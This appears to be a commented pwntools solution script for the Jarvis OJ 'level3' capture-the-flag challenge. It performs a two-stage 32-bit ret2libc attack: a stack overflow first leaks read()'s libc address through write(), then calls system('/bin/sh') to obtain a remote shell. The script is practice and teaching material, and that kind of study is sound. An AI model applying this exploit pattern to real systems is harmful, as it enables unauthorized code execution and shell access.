Jarvis OJ - level3 (32-bit ret2libc: leak read()'s GOT entry via write(), then call system("/bin/sh"))
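from pwn import *

# Exploit for Jarvis OJ "level3": a stack overflow in a non-PIE 32-bit
# binary, solved in two stages.
#   stage 1: overflow -> write(1, got_read, 4) leaks the resolved address
#            of read() in the remote libc, then "return" into the input
#            routine so we may overflow a second time.
#   stage 2: overflow -> system("/bin/sh") using offsets from the supplied
#            libc-2.19.so, rebased onto the leaked address.
#
# All payload pieces are bytes so the script behaves the same under
# Python 2 and Python 3 (mixing str with p32() output breaks on 3.x).

# Distance from the start of the overflowed buffer to the saved return
# address, as determined for this binary.
PAD = b'a' * 0x8C

# Address the stage-1 chain "returns" to after write(). Presumably the
# function that prompts "Input:" and reads our data again, which is what
# gives us the second overflow -- confirm with objdump if the leak works
# but stage 2 never gets a prompt.
STAGE1_RETURN = 0x0804844B

# Return address placed after system() in stage 2. Only matters if
# system() returns; any mapped address is fine.
STAGE2_RETURN = 0x08048480


def leak_read_addr(conn, elf):
    """Perform the stage-1 overflow and return read()'s address in the remote libc.

    Args:
        conn: pwntools tube connected to the challenge service.
        elf:  ELF object for the local 'level3' binary (non-PIE, so its
              PLT and GOT addresses are valid remotely).

    Returns:
        The 32-bit value stored in read()'s GOT entry on the remote side.
    """
    plt_write = elf.plt['write']   # PLT stub: calling it is a normal write()
    got_read = elf.got['read']     # GOT slot holding libc's read() address
    log.info('plt_write = ' + hex(plt_write))
    log.info('got_read = ' + hex(got_read))

    payload = PAD
    payload += p32(plt_write)       # overwritten return address -> write()
    payload += p32(STAGE1_RETURN)   # write()'s own return address
    payload += p32(1)               # fd  = stdout
    payload += p32(got_read)        # buf = &GOT[read]
    payload += p32(4)               # len = sizeof(void *) on i386

    conn.recvuntil(b"Input:\n")
    conn.send(payload)
    # recvn() blocks until exactly 4 bytes are available; a plain recv(4)
    # may return a shorter chunk and u32() would then raise.
    return u32(conn.recvn(4))


def build_system_payload(libc_base, libc):
    """Build the stage-2 overflow: system("/bin/sh") rebased on libc_base.

    Args:
        libc_base: load address of libc on the remote side.
        libc:      ELF object for the matching libc (libc-2.19.so here).

    Returns:
        bytes: padding + system address + dummy return + pointer to "/bin/sh".
    """
    # Symbol/string offsets come from the libc file instead of hard-coded
    # readelf/strings output, so a different libc only needs the ELF('...')
    # path changed.
    system_addr = libc_base + libc.symbols['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
    log.info('system_addr = ' + hex(system_addr))
    log.info('binsh_addr = ' + hex(binsh_addr))
    return PAD + p32(system_addr) + p32(STAGE2_RETURN) + p32(binsh_addr)


def main():
    """Connect, leak libc, and drop into an interactive shell."""
    conn = remote("pwn2.jarvisoj.com", 9879)
    elf = ELF('level3')
    libc = ELF('libc-2.19.so')

    read_addr = leak_read_addr(conn, elf)
    log.info('read_addr = ' + hex(read_addr))

    libc_base = read_addr - libc.symbols['read']
    # libc is mmap()ed at a page boundary; an unaligned base means the
    # local libc-2.19.so does not match the remote libc and stage 2 will
    # jump to garbage.
    if libc_base & 0xfff:
        log.warning('libc base 0x%x is not page-aligned; libc-2.19.so '
                    'probably does not match the remote libc' % libc_base)

    conn.send(build_system_payload(libc_base, libc))
    conn.interactive()


if __name__ == '__main__':
    main()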
Always believe that good things will come.